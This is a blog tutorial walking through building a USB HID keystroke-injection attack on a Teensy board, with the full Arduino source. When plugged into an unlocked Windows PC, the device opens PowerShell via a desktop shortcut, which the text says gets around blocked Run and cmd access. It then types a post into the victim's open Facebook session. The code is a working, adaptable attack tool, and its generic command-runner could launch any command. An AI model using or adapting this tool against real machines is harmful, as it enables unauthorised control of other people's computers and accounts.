May 24, 2018

USB HID attack – A zero to hero guide

(Last Updated On: 20th September 2016)

I’ve had a Teensy USB 3.2 Arduino board for around a year now with the intention of playing with some USB HID attacks and creating this blog has finally motivated me to do it.  Hurrah for the blog.  If you haven’t heard or seen anything about USB HID attacks they are a pretty neat little attack vector that leverages the fact that computers will automatically permit new keyboards.  They abuse this trust to load a small computer (often designed to look like a USB drive) with malicious code that, when plugged into an unlocked computer, will unleash pre-programmed keystrokes.  With a small amount of feedback coming from the virtual LEDs (num lock, caps lock and scroll lock) the code can even react to different conditions and environment and change the simulated key presses.  Cool stuff!

This guide will walk you through turning an out the box TeensyUSB into a Facebook attack tool that when plugged into an unlocked PC with an open Facebook session (not an open browser necessarily as long as the user hasn’t logged out of Facebook when closing the browser) will create a malicious post.  So grab yourself a TeensyUSB and lets get going.  I’ll also being doing a similar guide for the Raspberry Pi Zero when I get round to ordering one as it’s a little cheaper but more complicated for an application like this.  If you can’t be bothered with any of the complexity, get yourself a USB Rubber Ducky as seen on Mr.Robot.

Step 1, lets install some stuff.

teensyduino_alllibrariesFirst you need to download the Arduino software here and the TeensyUSB software from here.  Install the Arduino software first, which should look a little like this.  And then install the Teenduino software so it can install in the same location.  You should be able to keep everything as default for the installs but its worth checking the Teensyduino install to make sure all libraries are installed.

 

installingdevice

 

With our software installed, connect your TeensyUSB to your PC (I’m using Windows 10) and wait for the device drivers to install.  If they aren’t installing, try pressing the little button but it should just work.  The default software will flash the LED so you know its on.  The LED will flash though without the drivers loading successfully.

 

When your drivers have installed, open the Arduino software from the Desktop icon or from the start menu.

Step 2, programming the TeensyUSB.

The code at the bottom of this article can simply be copied in as is but its worth knowing what it is doing.  With this code the device will do nothing when initially plugged in until the user turns on numlock (as it’s for showing not doing malicious stuff!).  When they / you press that numlock key the script is going to break the loop that’s holding it back and begin the payload which will effectively use PowerShell to launch a browser (with the target set to Facebook) and prepare a status update.

To program the TeensyUSB you simply paste this code into the window you just opened and click the right arrow (second icon in on the toolbar) to program your device.  The screenshot below gives you an idea of what we are looking for.

arduinoapp

arduinoprogrammer

Clicking this button should (after a few seconds delay) open a new window which will probably automatically program your TeensyUSB device.  If it does not, press the little button on your device to put it into programming mode.

That’s it, hit the num lock key now and you should find that a browser opens to Facebook and prepares a status update for you, stopping just short of posting it!

You will notice that it uses the mobile Facebook experience and that’s because we need a static number of tab key presses to get to that status update box (12 as it happens for Chrome, change the script if the target is using IE or firefox) and the desktop experience requires you to tab through a list of groups which is of a dynamic length.  You may also notice it uses PowerShell to launch the browser rather than the run command, seems overkill right?  Wrong!  The average home user may have the run command enabled but any Enterprise with a proactive IT department will have blocked access to the run command (Windows Key + R) and the cmd.exe.  PowerShell though, well that’s on all Windows OS’s since Windows 7 and I haven’t seen it locked down yet :D.

Cool huh?  Program your board, plug it in to the target and turn on numlock to show the demo.

 

Code below, enjoy!

void setup() {
#define modifierKeyReleaseDelay 50
#define sendKeyReleaseDelay 50
#define ledPin 13
#define tabsToFBPost_Chrome 12
#define tabsToFBPost_IE 19
pinMode(ledPin, OUTPUT);
}
bool sendModifier(int Key)
{
Keyboard.set_modifier(Key);
Keyboard.send_now();
delay(modifierKeyReleaseDelay);
Keyboard.set_modifier(0);
Keyboard.send_now();
}

bool rightClick()
{
Keyboard.set_modifier(MODIFIERKEY_SHIFT);
Keyboard.set_key1(KEY_F10);
Keyboard.send_now();
delay(modifierKeyReleaseDelay);
Keyboard.set_key1(0);
Keyboard.set_modifier(0);
Keyboard.send_now();
delay(50); // Give it chance!
}

bool unSelectObject()
{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
delay(modifierKeyReleaseDelay);
Keyboard.set_key1(0);
Keyboard.set_modifier(0);
Keyboard.send_now(); 
delay(50); // Give it chance!
}

void sendKey(int key,int numberOfTimes){
int i=0;
for (i=0; i!=numberOfTimes; i++){
Keyboard.set_key1(key);
Keyboard.send_now();
delay(sendKeyReleaseDelay);
Keyboard.set_key1(0); 
Keyboard.send_now();
delay(50);
}
}
void goToDesktop() // Requires sendKey and unSelectObject
{
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.set_key1(KEY_M);
Keyboard.send_now();
delay(50);
Keyboard.set_key1(0);
Keyboard.set_modifier(0);
Keyboard.send_now();
delay(100); // Give it chance to minimise windows
sendKey(KEY_RIGHT,1); // Select a random item
unSelectObject(); // unSelect the random item
}

bool isNumLockOn()
{
if (keyboard_leds & 1)
{
return 1;
}
else
{
return 0;
}
}

void blink()
{
digitalWrite(ledPin, HIGH);
delay(200);
digitalWrite(ledPin, LOW);
}

void cmdViaShortcut(String cmd, String shortcutName) // Requires sendKey and goToDesktop
{
goToDesktop();
rightClick();
sendKey(KEY_W,1);
sendKey(KEY_W,1);
sendKey(KEY_RIGHT,1);
sendKey(KEY_S,1);
sendKey(KEY_ENTER,1);
delay(500); // Wait for the new shortcut window to open
Keyboard.print(cmd); 
sendKey(KEY_ENTER,1);
Keyboard.print(shortcutName);
sendKey(KEY_ENTER,1);
delay(500); // Wait for the shortcut to be created
goToDesktop();
Keyboard.print(shortcutName);
delay(100); // Wait for explorer to catch up
sendKey(KEY_ENTER,1);
}
void payload()
{
cmdViaShortcut("PowerShell.exe", "SimonsShortcut");
delay(3000); // Give PowerShell chance to initialise
Keyboard.print("& explorer 'http://m.facebook.com'");
sendKey(KEY_ENTER,1);
delay(2000); // Give IE chance to open
sendKey(KEY_TAB,tabsToFBPost_Chrome);
Keyboard.print("Simon has just given me a really effective lesson on the dangers of the TeensyUSB HID attack!"); // Chrome is 12th Tab in
}
void loop() {
while(!isNumLockOn()) // Wait for numlock
delay(50);
blink();
payload();
while(true); // Tarpit - Stop execution with a never ending loop
}


Previous «
Next »

Simon is a sysadmin for Local Government in North Yorkshire with a real passion for security and coding.

2 Comments

  1. Pingback: USB HID – what to do when cmd and run are disabled – Synack
  2. Pingback: Using PowerSploit to inject MSFVenom shellcode – Synack

Leave a Reply

Subscribe to SYNACK via Email

%d bloggers like this: